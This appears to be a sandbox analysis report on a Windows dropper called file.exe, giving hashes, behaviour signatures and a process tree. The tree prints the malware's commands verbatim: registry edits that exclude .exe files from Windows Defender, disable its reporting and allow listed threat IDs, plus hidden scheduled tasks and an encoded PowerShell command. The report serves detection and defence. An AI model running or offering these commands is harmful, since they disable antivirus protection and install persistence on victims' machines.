Analysis
-
max time kernel
144s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
30/10/2022, 17:25
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20220812-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
3b0c5f2340a8e359dc54b4d1a4a89b6a
-
SHA1
2bb5952c0413939d5eeae39bfdcf929b5eaf0d0a
-
SHA256
f9b99556e933fcb1d6b45e6288e36ea17d720ca35321874a2cd5471072d4f1bd
-
SHA512
6a05a00f08bc8d09adaf1a55099effb1d6bf18f640a332469e9fab8a6db9e5e44eb55f794de9fbbfbba62e44201a14f767260fff5972dde52ec210ba43830c9f
-
SSDEEP
196608:91OrAJ+1rJEqNsZFI0nt2toft+sca73VJr3RuCJ548Ug2eCbN6+:3OrAJgrJ6ZFI4oecmFx3gaWLeCx6+
Malware Config
Signatures
-
Executes dropped EXE 3 IoCs
pid Process 1028 Install.exe 4724 Install.exe 3212 ICnDKvs.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation Install.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\bnSGuSkVMPStTmmuin.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3508 schtasks.exe 4940 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 776 powershell.EXE 776 powershell.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 776 powershell.EXE -
Suspicious use of WriteProcessMemory 47 IoCs
description pid Process procid_target PID 2200 wrote to memory of 1028 2200 file.exe 82 PID 2200 wrote to memory of 1028 2200 file.exe 82 PID 2200 wrote to memory of 1028 2200 file.exe 82 PID 1028 wrote to memory of 4724 1028 Install.exe 83 PID 1028 wrote to memory of 4724 1028 Install.exe 83 PID 1028 wrote to memory of 4724 1028 Install.exe 83 PID 4724 wrote to memory of 1508 4724 Install.exe 84 PID 4724 wrote to memory of 1508 4724 Install.exe 84 PID 4724 wrote to memory of 1508 4724 Install.exe 84 PID 4724 wrote to memory of 4168 4724 Install.exe 86 PID 4724 wrote to memory of 4168 4724 Install.exe 86 PID 4724 wrote to memory of 4168 4724 Install.exe 86 PID 1508 wrote to memory of 4268 1508 forfiles.exe 88 PID 1508 wrote to memory of 4268 1508 forfiles.exe 88 PID 1508 wrote to memory of 4268 1508 forfiles.exe 88 PID 4168 wrote to memory of 1560 4168 forfiles.exe 89 PID 4168 wrote to memory of 1560 4168 forfiles.exe 89 PID 4168 wrote to memory of 1560 4168 forfiles.exe 89 PID 4268 wrote to memory of 2020 4268 cmd.exe 90 PID 4268 wrote to memory of 2020 4268 cmd.exe 90 PID 4268 wrote to memory of 2020 4268 cmd.exe 90 PID 1560 wrote to memory of 1376 1560 cmd.exe 91 PID 1560 wrote to memory of 1376 1560 cmd.exe 91 PID 1560 wrote to memory of 1376 1560 cmd.exe 91 PID 4268 wrote to memory of 4440 4268 cmd.exe 92 PID 4268 wrote to memory of 4440 4268 cmd.exe 92 PID 4268 wrote to memory of 4440 4268 cmd.exe 92 PID 1560 wrote to memory of 2412 1560 cmd.exe 93 PID 1560 wrote to memory of 2412 1560 cmd.exe 93 PID 1560 wrote to memory of 2412 1560 cmd.exe 93 PID 4724 wrote to memory of 3508 4724 Install.exe 94 PID 4724 wrote to memory of 3508 4724 Install.exe 94 PID 4724 wrote to memory of 3508 4724 Install.exe 94 PID 4724 wrote to memory of 3152 4724 Install.exe 96 PID 4724 wrote to memory of 3152 4724 Install.exe 96 PID 4724 wrote to memory of 3152 4724 Install.exe 96 PID 776 wrote to memory of 4176 776 powershell.EXE 100 PID 776 wrote to memory of 4176 776 powershell.EXE 100 PID 4724 wrote to memory of 4396 4724 Install.exe 105 PID 4724 wrote to memory of 4396 4724 Install.exe 105 PID 4724 wrote to memory of 4396 4724 Install.exe 105 PID 4724 wrote to memory of 4940 4724 Install.exe 107 PID 4724 wrote to memory of 4940 4724 Install.exe 107 PID 4724 wrote to memory of 4940 4724 Install.exe 107 PID 3212 wrote to memory of 3452 3212 ICnDKvs.exe 110 PID 3212 wrote to memory of 3452 3212 ICnDKvs.exe 110 PID 3212 wrote to memory of 3452 3212 ICnDKvs.exe 110
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2200 -
C:\Users\Admin\AppData\Local\Temp\7zS82F0.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1028 -
C:\Users\Admin\AppData\Local\Temp\7zS1359.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:4724 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1508 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4268 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:2020
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:4440
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:4168 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1560 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1376
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:2412
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gYTUXNGuT" /SC once /ST 01:27:46 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:3508
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gYTUXNGuT"4⤵PID:3152
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gYTUXNGuT"4⤵PID:4396
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bnSGuSkVMPStTmmuin" /SC once /ST 18:28:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\YLxxnXwFTRdwMLVMh\ZLyVHNmXIWjCvSJ\ICnDKvs.exe\" PO /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4940
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:776 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4176
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:2344
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:1840
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4776
-
C:\Users\Admin\AppData\Local\Temp\YLxxnXwFTRdwMLVMh\ZLyVHNmXIWjCvSJ\ICnDKvs.exeC:\Users\Admin\AppData\Local\Temp\YLxxnXwFTRdwMLVMh\ZLyVHNmXIWjCvSJ\ICnDKvs.exe PO /site_id 525403 /S1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3212 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵PID:3452
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.8MB
MD598194facdba27bf782b31886e115dee8
SHA1096b3e97c409f5c199305a52b3bc0c31f2d76d9c
SHA256be8c337e25625dd13de3e588b003fe0c78cbacae5d693727e8c13b6a58a15356
SHA512a469daea35e0bf8067ace8ca4c92363dcb84eeb7073e2780f51ef0b8c72da20a9dd398ba5f096d9d50d3cfedabdf92f325acd1b40fb1ffb5656c1459c180c996
-
Filesize
6.8MB
MD598194facdba27bf782b31886e115dee8
SHA1096b3e97c409f5c199305a52b3bc0c31f2d76d9c
SHA256be8c337e25625dd13de3e588b003fe0c78cbacae5d693727e8c13b6a58a15356
SHA512a469daea35e0bf8067ace8ca4c92363dcb84eeb7073e2780f51ef0b8c72da20a9dd398ba5f096d9d50d3cfedabdf92f325acd1b40fb1ffb5656c1459c180c996
-
Filesize
6.3MB
MD5f39a71a80bf924aa51d12e6e0f5aa781
SHA1be98cc60700ab9345dc1b0d8a446d17e79db49e5
SHA2563b14e9c5a49180eb02123f91b3855076b3e8eaad79b322da91aab55f4a7ede38
SHA51266cd62704f5859bef986b13b4890697ec8aa3852406c3fe20457fa8228bb54833a604598f23c0ca585e7f11e16042647e40e14897f1ea7ccff922b6c5300b978
-
Filesize
6.3MB
MD5f39a71a80bf924aa51d12e6e0f5aa781
SHA1be98cc60700ab9345dc1b0d8a446d17e79db49e5
SHA2563b14e9c5a49180eb02123f91b3855076b3e8eaad79b322da91aab55f4a7ede38
SHA51266cd62704f5859bef986b13b4890697ec8aa3852406c3fe20457fa8228bb54833a604598f23c0ca585e7f11e16042647e40e14897f1ea7ccff922b6c5300b978
-
Filesize
6.8MB
MD598194facdba27bf782b31886e115dee8
SHA1096b3e97c409f5c199305a52b3bc0c31f2d76d9c
SHA256be8c337e25625dd13de3e588b003fe0c78cbacae5d693727e8c13b6a58a15356
SHA512a469daea35e0bf8067ace8ca4c92363dcb84eeb7073e2780f51ef0b8c72da20a9dd398ba5f096d9d50d3cfedabdf92f325acd1b40fb1ffb5656c1459c180c996
-
Filesize
6.8MB
MD598194facdba27bf782b31886e115dee8
SHA1096b3e97c409f5c199305a52b3bc0c31f2d76d9c
SHA256be8c337e25625dd13de3e588b003fe0c78cbacae5d693727e8c13b6a58a15356
SHA512a469daea35e0bf8067ace8ca4c92363dcb84eeb7073e2780f51ef0b8c72da20a9dd398ba5f096d9d50d3cfedabdf92f325acd1b40fb1ffb5656c1459c180c996